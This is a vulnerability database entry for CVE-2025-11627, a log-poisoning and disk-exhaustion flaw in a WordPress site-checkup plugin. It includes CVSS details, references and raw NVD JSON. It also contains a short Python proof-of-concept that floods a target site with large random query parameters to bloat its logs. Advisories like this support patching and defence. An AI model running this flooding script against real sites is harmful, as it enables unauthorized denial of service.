CVE-2025-11627

Description

The Site Checkup Debug AI Troubleshooting with Wizard and Tips for Each Issue plugin for WordPress is vulnerable to log file poisoning in all versions up to, and including, 1.47. This makes it possible for unauthenticated attackers to insert arbitrary content into log files, and potentially cause denial of service via disk space exhaustion.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Site Checkup Debug AI Plugin < 1.48

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import random
import string

target_url = "http://target-wordpress-site.com"
plugin_path = "/wp-content/plugins/site-checkup/"

# Generate random content to poison log file
def generate_payload(size=10000):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=size))

# Send malicious requests to trigger log poisoning
for i in range(100):
    payload = generate_payload()
    params = {
        'error_test': payload,
        'debug': '1'
    }
    try:
        response = requests.get(target_url, params=params, timeout=10)
        print(f"Request {i+1}: Status {response.status_code}")
    except Exception as e:
        print(f"Request {i+1} failed: {e}")

print("Log poisoning attack completed. Check log file size.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11627
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11627
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11627/
[4] VulDB https://vuldb.com/cve/CVE-2025-11627
[5] https://plugins.trac.wordpress.org/browser/site-checkup/tags/1.47/includes/catch-errors/class_bill_catch_errors.php#L80
[6] https://plugins.trac.wordpress.org/changeset/3380169/
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/50251b17-58d7-4870-b825-a194312fb3e7?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11627", "sourceIdentifier": "[email protected]", "published": "2025-10-30T06:15:43.757", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Site Checkup Debug AI Troubleshooting with Wizard and Tips for Each Issue plugin for WordPress is vulnerable to log file poisoning in all versions up to, and including, 1.47. This makes it possible for unauthenticated attackers to insert arbitrary content into log files, and potentially cause denial of service via disk space exhaustion."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-117"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/site-checkup/tags/1.47/includes/catch-errors/class_bill_catch_errors.php#L80", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3380169/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/50251b17-58d7-4870-b825-a194312fb3e7?source=cve", "source": "[email protected]"}]}}